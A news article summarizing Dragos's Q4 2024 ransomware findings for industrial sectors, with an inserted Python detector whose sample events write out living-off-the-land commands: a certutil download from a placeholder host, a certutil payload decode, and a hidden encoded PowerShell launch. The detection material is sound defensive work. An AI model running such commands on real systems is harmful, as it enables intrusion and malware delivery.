Industrial cybersecurity company Dragos revealed that during the fourth quarter of 2024, the ransomware threat landscape presented an increasingly dynamic ecosystem, with multiple ransomware groups refining their techniques, expanding their capabilities, and forming new alliances, intensifying attacks on industrial organizations. The data revealed no new ransomware variants were designed for industrial control systems (ICS). However, ransomware attacks are still affecting industrial organizations, leading to operational disruptions such as forced production halts, manual failovers, and supply chain interruptions. 

“Throughout Q4 2024, newly branded or rebranded ransomware groups proliferated. Several leveraged leaked source code or formed partnerships with established adversaries, rapidly adopting advanced tactics, techniques, and procedures (TTPs),” Abdulrahman H. Alamri and Lexie Mooney, Dragos executives wrote in a company blog post this week. “In addition, many public resources indicated that nation-state adversaries openly aligned with ransomware operators, obscuring distinctions between financially driven and geopolitically oriented attacks. Collectively, these developments underscore a convergence of operational and strategic interests, resulting in increased theft of sensitive industrial data and both intended and unintended disruptions to industrial operations, ultimately causing prolonged downtime, safety risks, and financial losses for affected organizations.” 

They noted that Dragos assesses with low confidence that ransomware groups operating under the ransomware-as-a-service (RaaS) model create opportunities for financially, ideologically, or politically motivated adversaries to advance espionage, sabotage, and financial objectives. By leveraging these platforms, adversaries minimize detection and maintain operational continuity, complicating the efforts of law enforcement agencies to identify and impose sanctions. 

The post recognized that during the period, ransomware groups shifted tactics and alliances at a rapid pace. “Established operators such as RansomHub, LockBit3.0, and Play retained their dominance, while newly emerged or rebranded threats utilized modern infiltration methods and affiliate networks. Their focus on IT vulnerabilities, including unpatched VPN appliances, firewall firmware, and backup management solutions, led to operational disruptions in industrial environments.” 

Furthermore, the industrial sector, particularly the manufacturing, transportation, and ICS equipment and engineering sectors, remained a primary target as adversaries employed advanced tactics and leveraged weaknesses in remote access solutions and credential practices. 

During the quarter, Dragos observed the expansion of established ransomware groups and the emergence of new or rebranded operators focused on industrial environments. Adversaries frequently exploited VPN (virtual private network) appliances, firewall firmware, and backup management solutions to secure initial access, underscoring a continued reliance on low-barrier intrusion points. Ransomware operators demonstrated proficiency in targeting Windows, Linux, and ESXi systems and leveraged cloud-centric extortion methods to exfiltrate data and coerce victims. 

The executives noted that although Dragos has not yet observed cloud-centric tactics directly impacting ICS, ransomware groups’ growing adoption of legitimate cloud services signals a shift that could further complicate detection and incident response in operational settings.

Dragos’s ongoing research shows an uptick in ransomware adversaries using cloud platforms to exfiltrate data before executing ransomware encryption. These adversaries frequently adopt Azure Storage Explorer and AWS S3 Transfer Acceleration, blending malicious activity with legitimate cloud traffic to evade detection. Although Dragos has not observed any OT-focused compromise resulting directly from these cloud-centric intrusion methods, adversaries who gain a foothold through such tactics can potentially escalate their attacks, impacting OT environments or critical IT systems that support industrial operations. 

The executives added that multiple ransomware groups continued to leverage ‘living-off-the-land’ (LoTL) techniques by utilizing built-in Windows binaries (e.g., certutil.exe, PowerShell) to side-load or memory-inject malicious code, evading typical signature-based detection approaches. Notably, BlackBasta used specially crafted QR codes embedded within Microsoft Teams messages to trick employees into downloading remote monitoring tools, thereby creating post-exploitation footholds (i.e., establishing persistent access that allows adversaries to continue moving laterally, gathering intelligence, and re-infecting systems even if the initial intrusion is detected). 
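The LoTL technique described above is hard to catch with file signatures because the binaries are legitimate, so detection has to look at how they are invoked. The following is an added example (not code from the Dragos report) that scans constructed process-creation events, in the shape of Sysmon Event ID 1 or Windows 4688 records, for command-line patterns in which certutil.exe or PowerShell is used for download, decode or hidden/encoded execution rather than its documented purpose; the hostnames, paths and URL are placeholders, and the rule set is an assumed starting point that would need tuning against an environment's own baseline.

```python
import re

# Constructed sample events (not from the report): one benign certutil use,
# two commonly abused certutil invocations, one encoded/hidden PowerShell launch,
# and one benign scripted PowerShell run.
SAMPLE_EVENTS = [
    {"host": "eng-ws-01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -store My"},
    {"host": "eng-ws-01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/update.bin "
                r"C:\Users\Public\update.bin"},
    {"host": "hmi-02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -decode C:\Users\Public\payload.txt C:\Users\Public\payload.dll"},
    {"host": "hmi-02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"host": "fileserver", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

# (binary name, command-line pattern, reason). These are assumed heuristics:
# the switches are documented features, so each hit needs review, not auto-blocking.
LOTL_RULES = [
    ("certutil.exe", re.compile(r"-(urlcache|decode|encode)\b", re.I),
     "certutil used for download/decode"),
    ("powershell.exe", re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I),
     "encoded PowerShell command"),
    ("powershell.exe", re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
     "hidden PowerShell window"),
]


def find_lotl(events):
    """Return one finding per (event, matching rule), in event order then rule order."""
    findings = []
    for ev in events:
        binary = ev["image"].rsplit("\\", 1)[-1].lower()  # match on the image name only
        for name, pattern, reason in LOTL_RULES:
            if binary == name and pattern.search(ev["cmdline"]):
                findings.append({"host": ev["host"], "binary": binary,
                                 "reason": reason, "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in find_lotl(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['reason']} -> {f['cmdline']}")
```

The benign entries (certificate store query, scheduled backup script) produce no findings, while the download, decode and encoded/hidden launches each do; in practice the same logic would run over the EDR or SIEM process-creation feed rather than an inline list.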

Ransomware incidents during the period continued to vary by region, with North America remaining the most frequently targeted area. As in previous quarters, the data demonstrates a global scope for ransomware threats, affecting diverse geographies and multiple sectors. 

North America had 308 reported incidents, approximately 51 percent of global ransomware activity, with the U.S. accounting for most of these attacks. Europe had 168 incidents (approximately 28 percent of global ransomware activity). The U.K., Germany, and Italy remained top targets, with attacks primarily affecting manufacturing and transportation. In Asia, about 70 incidents were detected, making up roughly 12 percent of global ransomware activity.

Dragos reported that South America recorded 19 incidents (approximately three percent of global ransomware activity). Brazil registered most of the attacks in the region, with most operations focusing on food and beverage manufacturing and transportation systems. The Middle East reported 13 incidents, roughly two to three percent of global ransomware events; Oceania faced a total of 14 incidents, with Australia and New Zealand being the primary targets; and Africa had seven incidents, representing under two percent of global incidents, with South Africa and Tunisia accounting for the most reported attacks.

The post also reported that manufacturing remained the most impacted sector, with 424 observed incidents, accounting for 70 percent of ransomware activity, while industrial control systems (ICS) equipment and engineering experienced 58 incidents, representing 10 percent of total activity. The transportation sector encountered 69 incidents (around 11 percent); oil and natural gas (ONG) recorded 19 incidents (about three percent); the government and water sectors each faced five incidents (about one percent each); mining reported four incidents; the renewables sector faced three incidents; and datacenters experienced two incidents.

Dragos detailed that during the period, ransomware attacks continued to significantly disrupt industrial organizations, leading to operational halts, financial losses, and compromised data integrity. One notable incident occurred in November at Refinadora Costarricense de Petróleo (RECOPE), Costa Rica’s state-owned energy provider, which was forced to operate fully on manual processes after a ransomware attack disabled the digital systems supporting payment processing and fuel sales. Although no shortages or supply interruptions were reported, the loss of automated workflows markedly increased transaction times, forced personnel to rely on paper-based records, and required assistance from external specialists for remediation.

Another incident, updated in December, affected beverage manufacturer Stoli Group, which experienced extensive IT infrastructure disruptions following a ransomware attack, eventually leading to bankruptcy filings for its U.S. subsidiaries. The incident rendered core systems, such as enterprise resource planning (ERP), unusable, forced employees to rely on manual data entry, and undermined normal operations across Stoli’s global footprint. This large-scale shift away from digital workflows severely affected production schedules, supply chains, and overall financial performance.

Lastly, Dragos listed Pittsburgh Regional Transit (PRT), targeted in December, when a ransomware attack delayed bus and rail services for hours across Pittsburgh, affecting thousands of daily commuters. The interruption to key scheduling and ticketing platforms caused extended wait times, forced route alterations, and limited travelers’ ability to purchase new tickets or refill transit cards.

Dragos’ analysis of ransomware activity indicates further fragmentation in the ecosystem. Several groups demonstrated notable prevalence: LockBit3.0 accounted for 70 incidents (about 12 percent), maintaining a high level of activity despite law enforcement disruptions earlier in 2024; Play was linked to 63 incidents (about 10 percent) and continues to focus on critical infrastructure and industrial victims; RansomHub reported 56 incidents (about nine percent), running an aggressive RaaS model that attracts affiliates from disrupted operations and heavily targets industrial organizations; and Akira accounted for 43 incidents (about seven percent), known for double extortion tactics and cross-platform expansion.

The executives noted that Hunters International was involved in 26 incidents (about four percent), with Dragos observing increased activity involving the exploitation of remote access vulnerabilities; BlackBasta, linked to 25 incidents (about four percent), continues to deploy sophisticated social engineering and RMM-based infiltration; and MeowLeaks reported 24 incidents (about four percent) in the fourth quarter, for which Dragos identified a double extortion approach that often emphasizes large-scale exfiltration of data to pressure victims into paying the ransom.

The post added that MedusaLocker and Cactus were involved in 22 incidents each (about four percent); BlackSuit accounted for 20 incidents, some of which caused operational impacts on water treatment and automotive suppliers; Qilin and Inc Ransom reported 17 incidents each; and 8Base registered 15 incidents.

Dragos called upon organizations to prioritize key cybersecurity measures such as enforcing multi-factor authentication (MFA), monitoring critical ports, maintaining offline backups, and strengthening remote access controls. In addition, enhanced personnel training and periodic network architecture reviews are vital for staying ahead of continually adapting ransomware techniques. 

As the ransomware ecosystem continues to fragment and adapt, proactive defenses, threat intelligence sharing, and collaborative mitigation efforts will be essential to safeguarding critical infrastructure and industrial operations into the next quarter and beyond.
